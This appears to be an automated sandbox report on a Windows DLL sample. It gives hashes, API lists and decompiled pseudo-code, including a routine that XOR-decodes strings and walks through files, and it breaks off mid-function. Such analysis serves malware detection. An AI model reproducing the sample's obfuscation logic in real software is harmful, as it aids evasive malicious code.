Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 7901ba083263374625edebde68f32c10e3250f94204679bcd7377e65e5804c91
Instruction ID: 50f7a7225fd23d91bec8675473d4926d6c272723abb53727a680cbcd0fae8e65
Opcode Fuzzy Hash: 7901ba083263374625edebde68f32c10e3250f94204679bcd7377e65e5804c91
Instruction Fuzzy Hash: 7FF0F836404619BBEF121FD9CC0CA8E3F6AFB097A0B004410FA5995164C7328AA2DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA5E91, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA5E91() {

				E6EDA6B43( *0x6edc4258);
				 *0x6edc4258 = 0;
				E6EDA6B43( *0x6edc425c);
				 *0x6edc425c = 0;
				E6EDA6B43( *0x6edc3f3c);
				 *0x6edc3f3c = 0;
				E6EDA6B43( *0x6edc3f40);
				 *0x6edc3f40 = 0;
				return 1;
			}

0x6eda5e9a
0x6eda5ea7
0x6eda5ead
0x6eda5eb8
0x6eda5ebe
0x6eda5ec9
0x6eda5ecf
0x6eda5ed7
0x6eda5ee0

APIs

_free.LIBCMT ref: 6EDA5E9A

Part of subcall function 6EDA6B43: HeapFree.KERNEL32(00000000,00000000,?,6EDA5D93), ref: 6EDA6B59
Part of subcall function 6EDA6B43: GetLastError.KERNEL32(?,?,6EDA5D93), ref: 6EDA6B6B

_free.LIBCMT ref: 6EDA5EAD
_free.LIBCMT ref: 6EDA5EBE
_free.LIBCMT ref: 6EDA5ECF

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4fabb3e37597672dac55bd08c6312340b0bd10d410a1d019d530a35d259aff14
Instruction ID: 084af87c8ceacb8adee5856a357d5877f54a3b6fde1557ba607a973290d125ee
Opcode Fuzzy Hash: 4fabb3e37597672dac55bd08c6312340b0bd10d410a1d019d530a35d259aff14
Instruction Fuzzy Hash: D5E04F70430962DAAE017F5ED40D88DFB3DE78AF883050886E42002210D73143139F90

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA5790, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6EDA5790(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E6EDA7A6E(_t48);
						E6EDA74BB(_t48, _t57, 0, 0x6edc3c98, 0, 0x6edc3c98, 0x104);
						_t26 =  *0x6edc3f44; // 0x1363318
						 *0x6edc3f34 = 0x6edc3c98;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6edc3c98;
							_v20 = 0x6edc3c98;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6EDA5A41(E6EDA58C8( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6EDA58C8( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6EDA73AE(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6edc3f38 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6edc3f3c = _t58;
											L18:
											E6EDA6B43(_t37);
											_v12 = 0;
											L19:
											E6EDA6B43(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6edc3f38 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6edc3f3c = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6EDA6AD3(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6EDA6AD3(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6EDA6A16();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x6eda5790
0x6eda5799
0x6eda579e
0x6eda57a8
0x6eda57ab
0x6eda57c8
0x6eda57c9
0x6eda57dc
0x6eda57e1
0x6eda57e9
0x6eda57ef
0x6eda57f2
0x6eda57f4
0x6eda57fb
0x6eda57fb
0x6eda57fd
0x6eda5800
0x6eda5803
0x6eda580a
0x6eda5823
0x6eda5828
0x6eda582a
0x6eda584b
0x6eda5853
0x6eda5856
0x6eda5871
0x6eda5874
0x6eda587b
0x6eda587f
0x6eda5881
0x6eda5888
0x6eda588b
0x6eda588d
0x6eda588f
0x6eda5891
0x6eda589b
0x6eda589b
0x6eda589d
0x6eda58a3
0x6eda58a6
0x6eda58a8
0x6eda58ae
0x6eda58af
0x6eda58b5
0x6eda58b8
0x6eda58b9
0x6eda58bf
0x6eda58c2
0x00000000
0x00000000
0x00000000
0x00000000
0x6eda5893
0x6eda5893
0x6eda5893
0x6eda5896
0x6eda5897
0x6eda5897
0x00000000
0x6eda5893
0x6eda5883
0x00000000
0x6eda5883
0x6eda585b
0x6eda585b
0x6eda585c
0x6eda5861
0x6eda5863
0x6eda5865
0x6eda586a
0x6eda586a
0x00000000
0x6eda586a
0x6eda582c
0x6eda5831
0x6eda5833
0x6eda5834
0x00000000
0x6eda5834
0x6eda57f6
0x6eda57f9
0x00000000
0x00000000
0x00000000
0x6eda57f9
0x6eda57ad
0x6eda57b0
0x00000000
0x00000000
0x6eda57b2
0x6eda57b9
0x6eda57ba
0x6eda57bc
0x6eda57c1
0x00000000
0x6eda57c1
0x00000000

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6EDA57D3, 6EDA57DA, 6EDA5810

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: c4768271b4096b75a9efd88111106e7d49406477cf65ca6126c61806d7971ac8
Instruction ID: 60ebd097e28db48506b89f622d5bb3145556e076daab8efab9f9e4be62b0eb3f
Opcode Fuzzy Hash: c4768271b4096b75a9efd88111106e7d49406477cf65ca6126c61806d7971ac8
Instruction Fuzzy Hash: 9E41A271E50615FFDB51DFEDD88499EBBBCEB8A710B1004A6E614AB240D7708B41CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 6292 Parent PID: 6196 regsvr32.exeCOMMON

Executed Functions

Function 6EDA23D0, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 289
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E6EDA23D0() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				struct _WIN32_FIND_DATAA _v596;
				long _v600;
				long _v604;
				void _v605;
				void _v606;
				intOrPtr _v624;
				void* _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				char _v656;
				char _v660;
				intOrPtr _v664;
				intOrPtr* _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t77;
				struct _SECURITY_ATTRIBUTES** _t82;
				char _t83;
				void* _t86;
				void* _t89;
				struct _SECURITY_ATTRIBUTES** _t91;
				char _t92;
				void* _t98;
				void* _t100;
				void* _t114;
				void* _t127;
				void* _t128;
				long _t129;
				void* _t130;
				void* _t131;
				void* _t134;
				void* _t135;
				signed int _t136;
				char* _t137;
				void* _t140;
				void* _t142;
				intOrPtr* _t143;
				char* _t146;
				char* _t147;
				void* _t148;
				void* _t149;
				char* _t150;
				char* _t151;
				void* _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				signed int _t158;
				signed int _t160;
				int _t177;

				_t160 = (_t158 & 0xfffffff8) - 0x2a4;
				_t77 =  *0x6edc3004; // 0xece3dae
				_v8 = _t77 ^ _t160;
				_v664 =  *0x6edc56bc;
				_v660 = 0;
				_v656 = 0x62b173f7;
				_v652 = 0x7afa27fd;
				_v648 = 0x66b13ae3;
				_v644 = 0x70ea3aed;
				_v640 = 0x3aac7af9;
				_v636 = 0x159e4994;
				_v624 =  *0x6edc5ac4;
				if(_v660 == 0) {
					_t136 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t160 + 0x24 + _t136 * 4) =  *(_t160 + 0x24 + _t136 * 4) ^ 0x159e4994;
						_t136 = _t136 + 1;
					} while (_t136 < 6);
				}
				_t82 =  &_v276;
				_t130 = 0x104;
				do {
					 *_t82 = 0;
					_t82 =  &(_t82[0]);
					_t130 = _t130 - 1;
				} while (_t130 != 0);
				_t83 = _v276;
				_t146 =  &_v276;
				if(_t83 == 0) {
					L8:
					_t137 =  &_v656;
					if(_v656 != 0) {
						_t157 = _t146 - _t137;
						while(_t130 <= 0x104) {
							_t130 = _t130 + 1;
							 *((char*)(_t157 + _t137)) =  *_t137;
							_t137 =  &(_t137[1]);
							if( *_t137 != 0) {
								continue;
							}
							break;
						}
						_t83 = _v276;
					}
				} else {
					while(_t130 <= 0x104) {
						_t146 = _t146 + 1;
						_t130 = _t130 + 1;
						if( *_t146 != 0) {
							continue;
						} else {
							goto L8;
						}
						goto L13;
					}
				}
				L13:
				_t131 = 0;
				_t147 =  &_v276;
				if(_t83 == 0) {
					L16:
					_t137 = "*";
					_t148 = _t147 - _t137;
					while(_t131 <= 0x104) {
						_t131 = _t131 + 1;
						 *((char*)(_t148 + _t137)) =  *_t137;
						_t137 =  &(_t137[1]);
						if( *_t137 != 0) {
							continue;
						}
						goto L19;
					}
				} else {
					while(_t131 <= 0x104) {
						_t147 = _t147 + 1;
						_t131 = _t131 + 1;
						if( *_t147 != 0) {
							continue;
						} else {
							goto L16;
						}
						goto L19;
					}
				}
				L19:
				_t86 = FindFirstFileA( &_v276,  &_v596); // executed
				_t127 = _t86;
				asm("xorps xmm0, xmm0");
				_v628 = _t127;
				asm("movsd [esp+0x50], xmm0"); // executed
				_t177 = FindNextFileA(_t127,  &_v596);
				if(_t177 != 0) {
					while(1) {
						asm("movsd xmm0, [0x6edc1000]");
						asm("comisd xmm0, [esp+0x48]");
						if(_t177 <= 0) {
							goto L55;
						}
						_t91 =  &_v276;
						_t134 = 0x104;
						do {
							 *_t91 = 0;
							_t91 =  &(_t91[0]);
							_t134 = _t134 - 1;
						} while (_t134 != 0);
						_t92 = _v276;
						_t150 =  &_v276;
						if(_t92 == 0) {
							L27:
							_t137 =  &_v656;
							if(_v656 != 0) {
								_t156 = _t150 - _t137;
								while(_t134 <= 0x104) {
									_t134 = _t134 + 1;
									 *((char*)(_t156 + _t137)) =  *_t137;
									_t137 =  &(_t137[1]);
									if( *_t137 != 0) {
										continue;
									}
									break;
								}
								_t92 = _v276;
							}
						} else {
							while(_t134 <= 0x104) {
								_t150 = _t150 + 1;
								_t134 = _t134 + 1;
								if( *_t150 != 0) {
									continue;
								} else {
									goto L27;
								}
								goto L32;
							}
						}
						L32:
						_t135 = 0;
						_t151 =  &_v276;
						if(_t92 == 0) {
							L35:
							_t137 =  &(_v596.cFileName);
							if(_v596.cFileName != 0) {
								_t155 = _t151 - _t137;
								while(_t135 <= 0x104) {
									_t135 = _t135 + 1;
									 *((char*)(_t155 + _t137)) =  *_t137;
									_t137 =  &(_t137[1]);
									if( *_t137 != 0) {
										continue;
									}
									goto L39;
								}
							}
						} else {
							while(_t135 <= 0x104) {
								_t151 = _t151 + 1;
								_t135 = _t135 + 1;
								if( *_t151 != 0) {
									continue;
								} else {
									goto L35;
								}
								goto L39;
							}
						}
						L39:
						if((_v596.dwFileAttributes & 0x00000010) == 0 && _v596.nFileSizeLow < 0x7530) {
							_t129 = 0;
							_v676 =  *0x6edc5ecc;
							_v672 =  *0x6edc60d0;
							_v632 =  *0x6edc5cc8;
							_v668 =  *0x6edc62d4;
							_t98 = CreateFileA( &_v276, 0x80000000, 1, 0, 3, 0x80, 0); // executed
							_t142 = _t98;
							if(_t142 != 0xffffffff) {
								while(1) {
									_t100 = CreateFileA( &_v276, 0x80000000, 1, 0, 3, 0x80, 0); // executed
									_t153 = _t100;
									if(_t153 == 0xffffffff) {
										goto L53;
									}
									if(SetFilePointer(_t142, _t129, 0, 0) != 0xffffffff || GetLastError() == 0) {
										if(SetFilePointer(_t153, _t129, 0, 0) != 0xffffffff || GetLastError() == 0) {
											_v604 = 0;
											_v600 = 0;
											ReadFile(_t142,  &_v606, 1,  &_v604, 0);
											ReadFile(_t153,  &_v605, 1,  &_v600, 0);
											if(_v604 == 0 || _v600 == 0) {
												goto L52;
											} else {
												FindCloseChangeNotification(_t142); // executed
												 *_v668(_t153);
												_t129 = _t129 + 1; // executed
												_t114 = CreateFileA( &_v280, 0x80000000, 1, 0, 3, 0x80, 0); // executed
												_t142 = _t114;
												if(_t142 != 0xffffffff) {
													continue;
												} else {
												}
											}
										} else {
											goto L52;
										}
									} else {
										L52:
										_t143 = _v668;
										 *_t143(_t142);
										 *_t143(_t153);
									}
									goto L53;
								}
							}
							L53:
							asm("movsd xmm0, [esp+0x48]");
							asm("addsd xmm0, [0x6edc0ff8]");
							_t127 = _v628;
							asm("movsd [esp+0x48], xmm0");
						}
						if(FindNextFileA(_t127,  &_v596) != 0) {
							continue;
						}
						goto L55;
					}
				}
				L55:
				_t89 = _v624();
				_t140 = _t127;
				_pop(_t149);
				_pop(_t128);
				return E6EDA3753(_t89, _t128, _v12 ^ _t160, _t137, _t140, _t149);
			}

APIs

FindFirstFileA.KERNEL32(?,?), ref: 6EDA2511
FindNextFileA.KERNEL32(00000000,?), ref: 6EDA2528
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6EDA2660
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6EDA268A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 6EDA269D
GetLastError.KERNEL32 ref: 6EDA26A6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 6EDA26BA
GetLastError.KERNEL32 ref: 6EDA26C3
ReadFile.KERNEL32(00000000,?,00000001,?,00000000), ref: 6EDA26EC
ReadFile.KERNEL32(00000000,?,00000001,00000010,00000000), ref: 6EDA26FF
FindCloseChangeNotification.KERNEL32(00000000), ref: 6EDA2716
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6EDA273A
FindNextFileA.KERNELBASE(00000000,00000010), ref: 6EDA2771

Strings

KERNEL32.dll, xrefs: 6EDA23F0
:p, xrefs: 6EDA241E
0u, xrefs: 6EDA260F

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$Create$ErrorLastNextPointerRead$ChangeCloseFirstNotification
String ID: 0u$KERNEL32.dll$:p
API String ID: 398110528-1299952309
Opcode ID: 91764e3fb31b7943ff48fcd2f1afc61aac447d703f62185fa96c19a9afb258b7
Instruction ID: 6b39a90c5ffd552a26e893cbcd15593e781e99cbe68499da9e41a9a2d2b95bd5
Opcode Fuzzy Hash: 91764e3fb31b7943ff48fcd2f1afc61aac447d703f62185fa96c19a9afb258b7
Instruction Fuzzy Hash: 81B1E37050C380DFE761CF6AC8947AABBE8BF8A758F00095DE6D597180D7B0D645CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA38BB, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6EDA38BB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6edc13f8);
				E6EDA4120(__ebx, __edi, __esi);
				_t34 =  *0x6edc3870; // 0x1
				if(_t34 > 0) {
					 *0x6edc3870 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6EDA3D03();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6edc3bb0 - 2;
					if( *0x6edc3bb0 != 2) {
						E6EDA3F9D(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6edc1420);
						E6EDA4120(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6EDA3A76( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6EDA3761(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t76 = E6EDA2A70( *((intOrPtr*)(_t82 + 8)), _t72);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6EDA2A70( *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6EDA38BB(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6EDA3A76( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6EDA3761(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6EDA3A76( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6edc3870 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6EDA3DCE(__ebx, _t61, 1, __esi);
						E6EDA3C8A();
						E6EDA40EC();
						 *0x6edc3bb0 =  *0x6edc3bb0 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6EDA3950();
						_t54 = E6EDA3F6F( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6EDA395D();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

APIs

__RTC_Initialize.LIBCMT ref: 6EDA3902
___scrt_uninitialize_crt.LIBCMT ref: 6EDA391C

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 5d8d18bf1deabefab82f6d56be8e1a7bea548378366d5a119ef064c5a67a6d10
Instruction ID: 1b7ee4757967066011092c276b0bb0fd39eb2274b4b8b3f7a55d6bd2824e3abf
Opcode Fuzzy Hash: 5d8d18bf1deabefab82f6d56be8e1a7bea548378366d5a119ef064c5a67a6d10
Instruction Fuzzy Hash: 4441A472D04765EFDB619FEDC848B9E7ABAEB41B98F014519EA1467250C730CB028BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA396B, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6EDA396B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6edc1420);
				E6EDA4120(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6EDA3A76( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6EDA3761(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t45 = E6EDA2A70( *((intOrPtr*)(_t47 + 8)), _t42);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E6EDA2A70( *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6EDA38BB(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6EDA3A76( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6EDA3761(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6EDA3A76( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6edc3870 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

APIs

dllmain_raw.LIBCMT ref: 6EDA39A8
dllmain_crt_dispatch.LIBCMT ref: 6EDA39BF
dllmain_raw.LIBCMT ref: 6EDA3A07
dllmain_crt_dispatch.LIBCMT ref: 6EDA3A1A
dllmain_raw.LIBCMT ref: 6EDA3A2D

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 6b89ca80a7d88060c31f4fb9bfb97d467b38fa589a98b06e8609c63a3b6b32f1
Instruction ID: 6e94ad8b7065570bfcc0e1c116c1de7eb5669cbb18886fa8f534c3eb45477c61
Opcode Fuzzy Hash: 6b89ca80a7d88060c31f4fb9bfb97d467b38fa589a98b06e8609c63a3b6b32f1
Instruction Fuzzy Hash: 1A214172D04625EFDB618FDDC848AAF7A7ADB81B94B014515FA145B250D730CF528BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA37B4, Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6EDA37B4(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6EDA4120(__ebx, __edi, __esi);
				_t43 = E6EDA3DFE(__ecx, __edx, 0); // executed
				_t90 = 0x6edc13d8;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6EDA3D03();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6edc3bb0;
					if( *0x6edc3bb0 != 0) {
						E6EDA3F9D(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6edc13f8);
						E6EDA4120(1, __edi, __esi);
						_t48 =  *0x6edc3870; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6edc3870 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6EDA3D03();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6edc3bb0 - 2;
							if( *0x6edc3bb0 != 2) {
								E6EDA3F9D(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6edc1420);
								E6EDA4120(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6EDA3A76( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
